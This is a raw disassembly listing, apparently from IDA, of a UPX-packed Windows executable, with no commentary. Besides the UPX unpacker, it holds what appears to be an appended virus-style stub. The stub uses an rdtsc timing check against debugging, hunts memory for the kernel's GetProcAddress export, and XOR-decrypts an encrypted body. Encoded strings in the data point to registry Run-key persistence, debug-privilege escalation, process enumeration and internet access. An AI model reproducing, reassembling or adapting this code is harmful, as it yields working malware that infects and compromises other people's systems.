dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00011000 ( 69632.)
; Section size in file : 00011000 ( 69632.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
dd 1E00h, 78h, 75Dh dup(0)
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
cld
mov [eax+32C7h], ebx
mov ecx, [eax+297Fh]
mov ebx, [esp+4]
and ecx, 10000000h
jz short loc_3142A04C
pop ecx
mov [eax+32CBh], esi
mov cl, [eax+2983h]
mov [eax+32CFh], edi
cmp cl, 0E8h
jz short loc_3142A041
mov ebx, [eax+2985h]
jmp short loc_3142A04A
; ---------------------------------------------------------------------------
loc_3142A041: ; CODE XREF: UPX2:3142A037�j
add ebx, [eax+2984h]
mov ebx, [ebx+2]
loc_3142A04A: ; CODE XREF: UPX2:3142A03F�j
mov ebx, [ebx]
loc_3142A04C: ; CODE XREF: UPX2:3142A01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E05h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+103990h]
mov ecx, 0DAh
rep movsb
call sub_3142A125
mov ecx, eax
call sub_3142A125
sub eax, ecx
jz short loc_3142A0F7
cmp eax, 100h
ja short loc_3142A0F7
and ebx, 0FFFFF000h
loc_3142A08B: ; CODE XREF: UPX2:3142A09A�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3142A09C
loc_3142A094: ; CODE XREF: UPX2:3142A0A9�j
sub ebx, 100h
jnz short loc_3142A08B
loc_3142A09C: ; CODE XREF: UPX2:3142A092�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3142A094
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3142A0B6: ; CODE XREF: UPX2:loc_3142A0CA�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3142A0CA
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3142A0CF
loc_3142A0CA: ; CODE XREF: UPX2:3142A0BF�j
loop loc_3142A0B6
pop ecx
jmp short loc_3142A0F7
; ---------------------------------------------------------------------------
loc_3142A0CF: ; CODE XREF: UPX2:3142A0C8�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101141h]
mov dx, [eax-19h]
call sub_3142A12A
jmp short loc_3142A141
; ---------------------------------------------------------------------------
loc_3142A0F7: ; CODE XREF: UPX2:3142A07C�j
; UPX2:3142A083�j ...
mov eax, [ebp+103984h]
and eax, 10000000h
jz short loc_3142A123
mov edi, [esp+4]
lea esi, [ebp+103988h]
lodsd
mov ebx, [ebp+1042CCh]
stosd
movsb
mov edi, [ebp+1042D4h]
mov esi, [ebp+1042D0h]
loc_3142A123: ; CODE XREF: UPX2:3142A102�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3142A125 proc near ; CODE XREF: UPX2:3142A06E�p
; UPX2:3142A075�p
rdtsc
retn
sub_3142A125 endp
; ---------------------------------------------------------------------------
db 0C8h, 0C9h
; =============== S U B R O U T I N E =======================================
sub_3142A12A proc near ; CODE XREF: UPX2:3142A0F0�p
push ebx
mov ecx, 2843h
mov ebx, edx
loc_3142A132: ; CODE XREF: sub_3142A12A+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3142A132
pop ebx
retn
sub_3142A12A endp
; ---------------------------------------------------------------------------
loc_3142A141: ; CODE XREF: UPX2:3142A0F5�j
and ch, al
; ---------------------------------------------------------------------------
db 0
dd 1C743800h, 0A8C0DB01h, 3C7776BDh, 3FD2882Fh, 166A716Eh
dd 485D7818h, 10CBD899h, 0E15C3A41h, 86E2DD04h, 216146BBh
dd 67CCB4Ch, 7EDB8D33h, 0BDB77838h, 67CDE896h, 0F1772C61h
dd 72ECBC01h, 70655792h, 6953571Dh, 40CD3639h, 0C3A2602Ah
dd 0F04AF898h, 5F64EC09h, 0EFFB278Bh, 90276677h, 0FF473D50h
dd 60F6A93Bh, 0E9DE182Ch, 41D1188Fh, 5C06C7Dh, 20BDAABAh
dd 8522D51Ah, 8506C842h, 70E72D50h, 45E6AFC5h, 50C30D0Ch
dd 40E40B0Ah, 30AFE86Dh, 0B599CD65h, 938BD844h, 90ECC067h
dd 3630B830h, 70C7F61Bh, 65CA990Ch, 40A13648h, 0A5E3CD65h
dd 0E9BEE846h, 0AEC5E549h, 20D8C822h, 70D4B348h, 75BAF70Eh
dd 50A32602h, 0CF3E602Bh, 308F2CDCh, 0B4BAE3C6h, 0D368985Eh
dd 80C948CAh, 0C6C23118h, 8B53840h, 0D023EA00h, 0D56E0830h
dd 0B0EF467Eh, 0A46228B3h, 90DB5A4Ah, 0FC4585h, 0FBB72890h
dd 0EC9E1101h, 0BD12185Ch, 0C01198CAh, 22316DB5h, 52E68B6h
dd 0FCC83AEBh, 0EA45C3A2h, 0A9E78BF8h, 7BD0BDD3h, 7BF098DCh
dd 17F8F4B1h, 0AC9886B8h, 204E8041h, 5445885h, 39F6C4h
dd 0F5B7FCE3h, 7F81A70Eh, 0C773183Eh, 0C18B88C0h, 304BF870h
dd 0A0BD0006h, 85D4D8F5h, 80897654h, 74087855h, 60752ABCh
dd 0B8B398C6h, 4055081Ah, 587E78E2h, 2147BFFAh, 909A3034h
dd 95F6C8D3h, 70670676h, 0E1E5A2C6h, 66C6E71Ch, 28C198B4h
dd 302FF8FDh, 0A09F398Fh, 490BB2D4h, 8A1342A1h, 0CE4D2D4Fh
dd 91BE280Eh, 867E1B4Fh, 403118C4h, 0B2ABFC67h, 26E5E8D6h
dd 0DE7B5844h, 4CA58CE6h, 2C2C720h, 6DC5B8B0h, 4024CE49h
dd 4D68BB6Ah, 20314665h, 3373D946h, 10E9AB5Ch, 72E4CB22h
dd 0F0C7A8AEh, 6235ACF1h, 5528986Ch, 40013618h, 3F7E08B7h
dd 30D53333h, 4ADED324h, 0FFC9D8ACh, 0F5B83970h, 0E0B59146h
dd 6ED59D57h, 0B07E885Ah, 1F6A77B9h, 2B5D781Fh, 0F51219h
dd 7F23AB02h, 7528B901h, 600511E2h, 0EE5115C7h, 491208AAh
dd 3F5E09D7h, 30F4A113h, 9183B004h, 0BD24C872h, 700707A8h
dd 0E0EF67C5h, 200CC14Ah, 0C3800B2Eh, 0C9CCB8F2h, 0CA3D0251h
dd 0F31E556Ch, 391958F7h, 0F087B849h, 9EB82C33h, 0B69C67D3h
dd 0DD58531h, 0B03F7808h, 67204310h, 7429F3E0h, 3D7D5DDFh
dd 165B38D0h, 4B03AAA7h, 0B2D1DA1Fh, 0AA9503FFh, 42439078h
dd 6C9668E6h, 0D400D83Eh, 809148A8h, 9A6FB830h, 0A8779DEh
dd 45BCC802h, 40A136B4h, 0F0DBFBB0h, 20FF043Eh, 0FA2FD3C4h
dd 6AA54332h, 1AD752E0h, 0E02FFA0Ch, 50C1F414h, 9121E2EAh
dd 0CFDF0732h, 0B0C3BE53h, 95328734h, 875D475Dh, 7D47B811h
dd 70A528CBh, 0DC9821ECh, 0AF1A085Ah, 5D7EDD3Bh, 207DF836h
dd 849FDD29h, 0E0B6C802h, 50DD6CD0h, 75DA5784h, 50832682h
dd 0B55E484Fh, 3122100Ch, 0B13568A6h, 434BD814h, 0E2DC0CE7h
dd 8277DF85h, 0CFC5E37h, 0D066FFA9h, 453FE06Dh, 52078A8h
dd 205DAA5Ah, 0AED9CD7Bh, 0FF7EC8E2h, 60A91EF5h, 8A05C2CEh
dd 6E6E73Eh, 79E19894h, 304FF930h, 295C4311h, 477FFCF8h
dd 0BE03DD9Dh, 634B8C0h, 5F438DBDh, 84E398BCh, 0DEC4F74Dh
dd 35BF68B6h, 664B9C36h, 0E29FA6E7h, 247D373Ch, 1A775248h
dd 76705784h, 0D5530822h, 531DFC4Ah, 302A7E10h, 31545B66h
dd 9532E237h, 80697774h, 8C668AC5h, 13360C3Ah, 0F8B7EBFEh
dd 4E96C97Bh, 0E4CF7868h, 705CBE86h, 5840B14h, 0F9F6FCh
dd 40EF8A5h, 0C4B15781h, 66B697F4h, 28A19855h, 0CFF0051Dh
dd 86E89715h, 0FBEBC88Ah, 0A89DC9ACh, 0A7C7B891h, 5E13BD01h
dd 455C987Ch, 400136FCh, 4F84C6A1h, 4AB7E849h, 0FA5B3224h
dd 68C9A292h, 70333801h, 0E0CF6CE5h, 0DB1F728Ch, 9663778Eh
dd 30DBA7C0h, 48945B26h, 0EF34274Eh, 956ADD8Fh, 0A1F5B860h
dd 0F5EA788Fh, 0D093A666h, 83D1CC39h, 0B0072070h, 20CDDA7Ah
dd 903B566Fh, 0A9C873h, 701738E0h, 0E085A84Eh, 50F33138h
dd 0C061882Ah, 0CF9CAEC9h, 0B0035A93h, 0BCF27374h, 7B6C8866h
dd 7D4456B2h, 70EC552Bh, 459CCA2Ch, 40C13610h, 0F273FD81h
dd 3645E866h, 0DC1B58E4h, 75E2A73Dh, 198568B0h, 8509C158h
dd 31857DFBh, 8124FD66h, 0A550A878h, 0A00D56D4h, 52DB5DDDh
dd 0DC3A48D2h, 9514D972h, 5B849D0h, 0BA21D768h, 33C56B1Fh
dd 0E36B2EB4h, 20F98B33h, 0E28F2BA8h, 7AD5Eh, 11B24AE3h
dd 8903CD7Ah, 50F27D10h, 0A144FAA9h, 59C99D2Ch, 0C1B00DAAh
dd 7E02A844h, 0C3D909C5h, 8426DD62h, 0FC7781Bh, 0A350FD8Fh
dd 32D2081Bh, 0D58B19ADh, 4F008D64h, 0F88F3DD0h, 6428AD60h
dd 15C57B80h, 0B440DC8Fh, 31F66A34h, 0B24288AEh, 551B995Dh
dd 0CCB207F2h, 6027BD7Ch, 0EEEA7AB1h, 9854C891h, 25955C31h
dd 8477F1B4h, 21147A52h, 0D99978CCh, 49198D7Ah, 0FFEF3DE9h
dd 745AB1A1h, 19C35505h, 0A605CDA3h, 1C167D4Eh, 0A193EAC3h
dd 774F816Ah, 0C9FB1CE3h, 646ABD98h, 0E2F03A16h, 8362CCA5h
dd 532287Fh, 0BC8ADED8h, 3A385B7Fh, 0D5F878EDh, 4C44AE82h
dd 0FDF20C01h, 654EC8B7h, 14187534h, 0A880C4DBh, 3C37767Dh
dd 87C1C9EFh, 557B8C9Dh, 0C9DB180Bh, 7145BDB8h, 80382D2Fh
dd 0A493DDF7h, 3025457Bh, 91ABECEDh, 34544FFAh, 0C3ED1D3Eh
dd 206387BFh, 0C60F3D03h, 699ABAD7h, 812564Fh, 8582A8CFh
dd 3C5C4E88h, 89C4E51Fh, 42609EB6h, 0C909092Bh, 10AAB6DBh
dd 0E438276Eh, 82A5D1DCh, 214C5A9Fh, 0A0C2D56Ch, 3774618Ch
dd 0D9391E07h, 6FED8DDAh, 0D6353D54h, 4DACA4FBh, 19474861h
dd 0E0E4CF00h, 3E766893h, 0A3EEFA1Ah, 309C8BDDh, 0C3321A76h
dd 23B8ABF1h, 0F2500E30h, 0A0A7CC03h, 57647ACh, 0E2B0EB3Fh
dd 34896DF4h, 0C43A2B28h, 45A181D0h, 0E24F2C45h, 74DCAA1Bh
dd 70564B85h, 0A6F1CD1Dh, 49674D5h, 0C004E543h, 55AA94CBh
dd 0D96E6876h, 7DCEAC07h, 0E57421B6h, 99C1D704h, 9A14DD2h
dd 8563FD41h, 30B065F4h, 0C75A115Eh, 49EB8E39h, 0C61B3D88h
dd 75FDBA3Bh, 1CB654A1h, 0E006C742h, 24BA6ACBh, 0AC28CE6Fh
dd 44E1F81Dh, 0D5770CA7h, 62DBAC27h, 0EC903EABh, 8302DF55h
dd 5BE47CAh, 0A40D9862h, 21D47A39h, 0D9591D9Ch, 6E8D8D3Ah
dd 0F5891BB0h, 500CBC53h, 15B457D2h, 0AE45DB7Dh, 35C15B08h
dd 9044FC8Bh, 55EC972Ah, 0D8B81BB5h, 531F9634h, 0F4B82DD0h
dd 9322EB75h, 0EDA410Ah, 9357D6ECh, 34F06D28h, 0D58C2DADh
dd 4F1FB844h, 0E3A83DC7h, 4D3D8612h, 19E148E1h, 866ADF8Bh
dd 24F07D0Fh, 0C06FE7A3h, 40208C76h, 0C99B06C3h, 5E4BBD78h
dd 0E5C907F6h, 9F55E89Eh, 13E64D3Dh, 0B568F798h, 343F0854h
dd 0DEBA08E7h, 542E8D45h, 90D537EDh, 7279BCBCh, 13F24C0Fh
dd 926CFEBAh, 3C126D48h, 0AF8CEDE7h, 7E4F816Ah, 0C5C839F2h
dd 7E62A186h, 0EDEB2704h, 9F6ECCB1h, 0B1A7C50h, 9EE3F6C9h
dd 29235F6Eh, 0D9E91DFCh, 41589C84h, 0FDFE1508h, 70BABDh
dd 251B4C12h, 8F86C1C0h, 24007D78h, 0A7AFE1F8h, 5E6E97ACh
dd 0D4CE0115h, 7765B1A6h, 0C12A1F42h, 8286CCE3h, 60255D6Ah
dd 0A3ACF4EFh, 235E7B9Fh, 0B0EB1D03h, 4E6387B5h, 900F3B21h
dd 689DADD5h, 12234B4Fh, 8DA4C6F7h, 35411899h, 0B3A1FE09h
dd 306B96BDh, 0CB1E0735h, 59EBACD1h, 0F23C3C4Ch, 0B3B3DDFEh
dd 5464792h, 0B4CDF924h, 9116DB6h, 0C21A0C26h, 67998DD8h
dd 0FF182C41h, 63ACA6FCh
dd 23535D74h, 85D1C91Ah, 247D51DCh, 0A5EFFA2Fh, 559FB7CCh
dd 0E95D2948h, 62AEACFAh, 0CF4D2D6Ch, 0A5C9DD00h, 605444ACh
dd 0B5F7F605h, 349466C8h, 0D43E1D7Ah, 45A181D0h, 0C67F1904h
